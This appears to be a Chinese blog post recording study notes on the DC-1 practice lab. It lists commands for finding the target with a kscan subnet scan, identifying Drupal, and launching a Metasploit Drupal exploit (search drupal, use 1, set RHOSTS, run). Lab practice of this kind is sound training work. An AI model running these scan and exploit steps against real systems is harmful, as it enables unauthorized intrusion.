Dc-1学习记录

一、信息收集

(1)、获取本机ip

ip a

在这里插入图片描述

(2)、获取同段靶机ip

这里利用的是kscan工具,
查看当前路径

pwd

已经我们的kscan工具在桌面,所以切换路径到desktop

cd ~/Desktop

查看当前文件路径下的文件

ls

执行Linux命令,这里采用./的方法进行执行。

./kscan_linux_amd64 -t 192.168.209.0/24

在这里插入图片描述

在这里插入图片描述

发现靶机IP为:192.168.209.147,一般默认端口为80端口

二、漏洞挖掘

(1)、使用wappalyzer工具

192.168.209.147
在这里插入图片描述

我们可以看出这个网站使用了drupal系统框架

(2)、使用msf经验知识库

[1]、进入msf终端

在这里插入图片描述

在这里插入图片描述

[2]、寻找drupal框架漏洞

开始查看历史漏洞
search drupal
use 1
show options
set RHOSTS 192.168.209.147
run

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值